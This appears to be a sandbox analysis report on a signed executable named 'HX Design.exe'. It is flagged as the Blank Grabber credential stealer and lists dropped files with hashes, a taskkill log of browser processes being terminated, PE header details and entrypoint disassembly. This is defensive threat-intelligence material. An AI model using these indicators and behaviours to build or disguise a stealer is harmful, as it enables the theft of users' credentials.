Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\rarreg.key

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	467
Entropy (8bit):	4.503500478942566
Encrypted:	false
SSDEEP:	12:Bn9cZRI5sx1jD0xfhYaEjicNH0uMOCvbRhjWh:B9cZRI+/jDifejicNUkCvdEh
MD5:	9795F79DDB61AA29027F4D68496B379C
SHA1:	2B28DB4D9AC8CFFBA73048444B1DF25346F4EF32
SHA-256:	E63F3D6710097498085564DFC85ADD6ED4CF44238C33D20820D2426ABCEE4E31
SHA-512:	E44FBBC02DA75D173C81BDFDA9B14102997609AF06FD50C51030430C3C80193DADB632592997361C79B0DFED50CCC0E1743C306A881401A1C78A6A7FACB45D4D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rarreg.key, Author: Joe Security
Reputation:	unknown
Preview:	RAR registration data..Blank-c..Stealer License..UID=e7ae0ee11c8703113d95..64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf..afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407..3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287..15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83..55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc..e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d..b5915ff59f78103d48e0826658d72ba8813da4a649711057613203..

C:\Users\user\AppData\Local\Temp\_MEI75082\select.pyd

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26384
Entropy (8bit):	7.471075877103443
Encrypted:	false
SSDEEP:	384:LZPhXaWPBRc6hmfZa7gJXIj2IJ9G46SHQIYiSy1pCQ4HWSJIVE8E9VF0Ny6sC:XaWlspYj2IJ9G4L5YiSyvy2ES
MD5:	FB70AECE725218D4CBA9BA9BBB779CCC
SHA1:	BB251C1756E5BF228C7B60DAEA1E3B6E3F9F0FF5
SHA-256:	9D440A1B8A6A43CFAA83B9BC5C66A9A341893A285E02D25A36C4781F289C8617
SHA-512:	63E6DB638911966A86F423DA8E539FC4AB7EB7B3FB76C30C16C582CE550F922AD78D1A77FA0605CAFFA524E480969659BF98176F19D5EFFD1FC143B1B13BBAAF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........tV..'V..'V..'_.j'T..'F:.&T..'F:.&R..'F:.&^..'F:.&Z..'.;.&T..'V..'...'...&S..'.;.&W..'.;.&W..'.;.'W..'.;.&W..'RichV..'................PE..d.....g.........." ...).0..........@.....................................................`......................................... ...L....................`..............l.......................................P...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75082\sqlite3.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	659216
Entropy (8bit):	7.993010988331354
Encrypted:	true
SSDEEP:	12288:ZI2xdk6g1SJU1uQWhSskWXgN/YeZE21RUMza8WznRGO+4:ZbxYw+AXSskaSweZ91uMu80x+4
MD5:	21AEA45D065ECFA10AB8232F15AC78CF
SHA1:	6A754EB690FF3C7648DAE32E323B3B9589A07AF2
SHA-256:	A1A694B201976EA57D4376AE673DAA21DEB91F1BF799303B3A0C58455D5126E7
SHA-512:	D5C9DC37B509A3EAFA1E7E6D78A4C1E12B5925B5340B09BEE06C174D967977264C9EB45F146ABED1B1FC8AA7C48F1E0D70D25786ED46849F5E7CC1C5D07AC536
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gsX.#.6.#.6.#.6.*j../.6.3.7.!.6.3.5.'.6.3.2.+.6.3.3...6.hj7. .6.#.7...6.k.>.".6.k.6.".6.k..".6.k.4.".6.Rich#.6.........................PE..d.....g.........." ...).....0......`.....................................................`..............................................#..........................................................................p...@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75082\ucrtbase.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1122768
Entropy (8bit):	6.6466118295886165
Encrypted:	false
SSDEEP:	24576:CJG2BrB3ZQAq0AT2jS9HKHdK6AccMs1wmxvSZX0ypFi:0VGrT6SAk3ei
MD5:	3B337C2D41069B0A1E43E30F891C3813
SHA1:	EBEE2827B5CB153CBBB51C9718DA1549FA80FC5C
SHA-256:	C04DAEBA7E7C4B711D33993AB4C51A2E087F98F4211AEA0DCB3A216656BA0AB7
SHA-512:	FDB3012A71221447B35757ED2BDCA6ED1F8833B2F81D03AABEBD2CD7780A33A9C3D816535D03C5C3EDD5AAF11D91156842B380E2A63135E3C7F87193AD211499
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T...:K..:K..:K..K..:K..;K..:KK..K..:KK.:J..:KK.9J..:KK.?J..:KK.>J.:KK.4J..:KK..K..:KK.8J..:KRich..:K........PE..d................" .....0..........0^...............................................N....`A................................................................. ...........!...... .......p............................Z..8..............(............................text...X .......0.................. ..`.rdata......@.......@..............@..@.data....&....... ..................@....pdata....... ......................@..@.rsrc...............................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\unicodedata.pyd

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	267024
Entropy (8bit):	7.9826656358602595
Encrypted:	false
SSDEEP:	6144:5FHvhlPKHwqcv9DqegNsKUuFLttFHg+hMrZ99hYN8khE7xj:5tJlyHwqSBqpNsKUuntFJhMF9HC8jj
MD5:	B2712B0DD79A9DAFE60AA80265AA24C3
SHA1:	347E5AD4629AF4884959258E3893FDE92EB3C97E
SHA-256:	B271BD656E045C1D130F171980ED34032AC7A281B8B5B6AC88E57DCE12E7727A
SHA-512:	4DC7BD1C148A470A3B17FA0B936E3F5F68429D83D552F80051B0B88818AA88EFC3FE41A2342713B7F0F2D701A080FB9D8AC4FF9BE5782A6A0E81BD759F030922
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.............(.....(.....(.....(.....)................).....).....)x....)....Rich..................PE..d.....g.........." ...).........0..P....@...................................0............`..........................................+..X....)....... .......................+..$...................................P...@...........................................UPX0.....0..............................UPX1.........@......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1n1mwv4r.cvm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_54cp2tsr.zox.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b35gw3us.vjz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bbluirgn.ewp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bgzu2wuy.hxw.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drwppdod.hbc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehfeda1h.tsy.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gluzp1xq.avy.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m0cct0m4.hlg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngk1wtti.3e4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tsgb51wk.k2a.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xhudp0km.zfg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z1c145t1.b1a.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zsxn0tuj.wwh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

\Device\ConDrv

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.331807756485642
Encrypted:	false
SSDEEP:	3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
MD5:	195D02DA13D597A52F848A9B28D871F6
SHA1:	D048766A802C61655B9689E953103236EACCB1C7
SHA-256:	ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
SHA-512:	1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
Malicious:	false
Reputation:	unknown
Preview:	..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

\Device\Null

Download File

Process:	C:\Windows\System32\taskkill.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	348
Entropy (8bit):	4.699001156790115
Encrypted:	false
SSDEEP:	6:BgnCdumaonuHjRbfAnCdumaonDjRbfAnCdumaonNXRbfAnCdumaonsRbfAnCdum0:jdOouDRZdOoXRZdOoNXRZdOosRZdOoO7
MD5:	AC27A65AA29D949B766DDEAEDC5A556E
SHA1:	1356864C83784BDF9F451E0C6C0F3B16283486DE
SHA-256:	49814406166AD0D6865D928BE634883D5C57614133418A2CB115C0A9B12AC8A1
SHA-512:	1A6A92ACB541E170BD2CDEEEB7CED36ECD9DD30B6291BCFC1E56FDA55727DBCA0FFEA3C1F438051423F9B14A1BD3CEA4A20595B93A94ABAAEF7BC1A108C5BC4A
Malicious:	false
Reputation:	unknown
Preview:	SUCCESS: The process "chrome.exe" with PID 908 has been terminated...SUCCESS: The process "chrome.exe" with PID 648 has been terminated...SUCCESS: The process "chrome.exe" with PID 2800 has been terminated...SUCCESS: The process "chrome.exe" with PID 7976 has been terminated...SUCCESS: The process "chrome.exe" with PID 7972 has been terminated...

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.994827864219541
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	HX Design.exe
File size:	9'441'536 bytes
MD5:	55933983c78673a3d30c3d7f8bd54b83
SHA1:	d9e701fe9c117fb428a533c219af3fcffbc42f34
SHA256:	9203d748f205c44735ccb43f9312cc818693de205075d8c0d3a3582eca6e2e63
SHA512:	a653744b73ab5332ffe665ed87d5fb2c061b336bd4f92e6adbb0e05ce9fbffb82f9364d7b56239bb7d664ce6830bc5112d76ce91c5321613fe6a5d2ec62b97cd
SSDEEP:	196608:7tJekYKawfI9jUC6i4H1qSiXLGVi7DMjpZYHQK6Me+Okc/iLJ:eQIH6iK1piXLGVE4N2wK6la
TLSH:	6D963302AA8049F6F2F7593CC895800DD0737BA21BA0EBAB075CD2695DB31F58936777
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n=..\.Z\.Z\.Za$.[-\.Za$.[.\.Za$.[ \.Z:..Z)\.Z:..[#\.Z:..[;\.Z:..[.\.Za$.[!\.Z\.Z.\.Zb..[3\.Zb..[+\.ZRich*\.Z........PE..d..

File Icon


Icon Hash:	03214d65353d2101

Static PE Info

General

Entrypoint:	0x14000cdb0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6764D27C [Fri Dec 20 02:12:12 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	72c4e339b7af8ab1ed2eb3821c98713a

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=SSL.com Code Signing Intermediate CA ECC R2, O=SSL Corp, L=Houston, S=Texas, C=US
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	19/12/2024 02:57:07 19/12/2025 02:57:07
Subject Chain	CN=Nguy\u1ec5n V\u0103n Tu\u1ea5n, O=Nguy\u1ec5n V\u0103n Tu\u1ea5n, L=Huy\u1ec7n H\u01b0ng H\xe0, S=Th\xe1i B\xecnh, C=VN
Version:	3
Thumbprint MD5:	9E5BCDCA4C3680A150B89D1F7A41F8FF
Thumbprint SHA-1:	9AE50F22379325CC7A0AEBCD570E8BDD66F16AAD
Thumbprint SHA-256:	A800FDC4C52D8959F924280FF0ECA2B05A7C3F44A62D130922A08B712DC43BB9
Serial:	232FC1EDBB147B0927E13ED8D7F12C47

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F4600FF6B9Ch
dec eax
add esp, 28h
jmp 00007F4600FF67BFh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007F4600FF6F68h
test eax, eax
je 00007F4600FF6963h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007F4600FF6947h
dec eax
cmp ecx, eax
je 00007F4600FF6956h
xor eax, eax
dec eax
cmpxchg dword ptr [0003577Ch], ecx
jne 00007F4600FF6930h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007F4600FF6939h
int3
int3
int3
dec eax
sub esp, 28h
test ecx, ecx
jne 00007F4600FF6949h
mov byte ptr [00035765h], 00000001h
call 00007F4600FF6095h
call 00007F4600FF7380h
test al, al
jne 00007F4600FF6946h
xor al, al
jmp 00007F4600FF6956h
call 00007F4601003E9Fh
test al, al
jne 00007F4600FF694Bh
xor ecx, ecx
call 00007F4600FF7390h
jmp 00007F4600FF692Ch
mov al, 01h
dec eax
add esp, 28h
ret
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [0003572Ch], 00000000h
mov ebx, ecx
jne 00007F4600FF69A9h
cmp ecx, 01h
jnbe 00007F4600FF69ACh
call 00007F4600FF6EDEh
test eax, eax
je 00007F4600FF696Ah
test ebx, ebx
jne 00007F4600FF6966h
dec eax
lea ecx, dword ptr [00035716h]
call 00007F4601003C92h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3ca5c	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x47000	0x40e4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x44000	0x2250	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x8ff868	0x1898
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4c000	0x764	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a080	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x39f40	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b000	0x4a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29f00	0x2a000	2a7ae207b6295492e9da088072661752	False	0.5514439174107143	data	6.487454925709845	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2b000	0x12a50	0x12c00	d6e871de58b2ad747fe259938e55e93e	False	0.5244661458333333	data	5.752626136336296	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
